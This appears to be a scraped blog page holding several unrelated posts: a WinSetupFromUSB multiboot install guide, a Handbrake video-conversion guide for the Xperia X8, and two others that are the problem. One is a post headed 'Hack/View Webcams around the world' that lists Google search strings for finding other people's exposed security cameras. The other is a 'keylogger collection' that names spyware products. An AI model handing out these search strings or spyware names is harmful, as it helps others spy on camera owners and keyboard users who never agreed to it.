1. Previous methods of creating of the bootable USB drive for Windows XP involves numbers of steps and takes lot of time to complete.
2. You are to use the similar Operating System to prepare the USB disk. i.e if you want to prepare your USB drive to install Windows XP, you’ll have to use Windows XP to apply the preparation method. The similar condition is applicable when preparing the USB drive for Windows 7.
3. Those methods do not have any option to prepare the USB disk in such a way that it would install both Windows XP and Windows 7 after spending one time effort.
But we found an awesome free utility WinSetupFromUSB which comes across drawbacks and allows you to create a Multiboot USB drive to install Windows XP and Windows 7 from the same USB drive. No need to prepare your USB stick separately. Even the tool works in both Windows XP and Windows 7.
Creating the Multiboot USB Drive for Windows 7 and XP
Creating the multiboot USB drive is too easy and involves four simple steps. Before getting into the process, make sure that the USB drive that you have, is minimum 4 GB of volume (recommended 8 GB) and formatted with FAT32 file system. Once you are ready, download WinSetupFromUSB and extract at any location of your computer.Then follow the steps below:
1. Insert the formatted USB drive in the USB post of your computer and run the WinSetupFromUSB_1-0-beta7.exe.
2. Make sure that the the utility has detected your USB drive.
3. Now enable the option Windows 2000/XP/2003 Setup selecting the check box and browse to the Windows XP installation file location. Next, enable the option Vista/7/Server 2008 Setup/PE/RecoveryISO and browse to the Windows 7 installation files’ location. In both of the cases, if you have the ISO images, extract them by WinRar or 7-Zip.
4. Click the Go button to get started. It might take several minutes.
Though we have discussed the process for only Windows XP and Windows 7, you can also add Windows Vista as well as Linux.
Hack/View Webcams around the world [for free]
Hack/View Webcams around the world [for free]
Copy/Paste any ONE of these search strings into google and it will produce live security/webcams. Most are controllable/zoom etc. Just go to www.google.com and key in the below:-inurl:/view.shtml
inurl:ViewerFrame?Mode=
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”
keylogger collection
there are many keyloggers out there but most of them are on paid version
|
||
stealth keylogger w investor keylogger remote keylogger soft central keylogger invisibal keylogger home keylogger ghost keylogger golden keylogger ardmax keylogger actual spy keylogger |
How to convert videos and get them on your Sony Ericsson Xperia X8
Thankfully this is very straight forward, with a little help from Know Your Mobile, and by following these steps you'll be able to convert videos and port them over to your Xperia X8 device.
You'll need the following things, though, before you get started:
- Installed copy of Handbrake software
- Video files and or DVD of your choice
- Sony Ericsson Xperia X8 with microUSB cable
- Launch Handbrake (figure 1)
- In the menu on the right-hand side, select the iPod Legacy preset (figure 1)
- Select your video source by clicking on the Source dropdown menu (we used a DVD for our testing purposes)
- Select the destination and name for the file once it has been converted (both the .mp4 and .m4v extension work for the Xperia X8)
- Confirm that the container is set to MP4 File and that Large file size, Web optimized, and iPod 5G support are unchecked
Picture Tab:
- Uncheck Keep Aspect Ratio
- Set the Xperia X8 Width and Height (the Xperia X8 supports a maximum of 480 x 320 pixels)
- Set Handbrake's encoding settings by clicking on the Video tab (figure 2)
- Confirm the Video Codec is set as H.264 (x264)
- Framerate (FPS) should be set to Same as source
- Under Quality, select the Avg Bitrate (kbps) and change it to 1500
- Set Handbrake's audio settings by clicking on the Audio tab (figure 3)
- Confirm the Audio Codec is AAC (faac)
- Mixdown should be set to Stereo
- Change the Samplerate to 48
- Change the Bitrate to 160
- Click on the Presets menu and select New Preset
- Enter Xperia X8 in the dialog box and click Add
- "Xperia X8" will now be saved as a preset and listed on the right hand side in Handbrake to be used in the future
- Click on the Start button in Handbrake
- A command line/DOS window will open and start to process the video conversion
- Once the conversion is done, mount your Xperia X8 on to your computer via USB
- Once mounted, create a folder named Video in the root folder on the Xperia X8
- Copy converted file into the Video folder
A few things to keep in mind when converting video:
- The Xperia X8 does not like video file sizes over 2GB (the settings in Step II should help insure that the file size is kept under 2GB)
- Your converted video will only be as good as the source video
- If your source is over 480 x 320, you must be sure to set the width and height to a maximum of 480 x 320 as noted in Step II
Subscribe to:
Posts (Atom)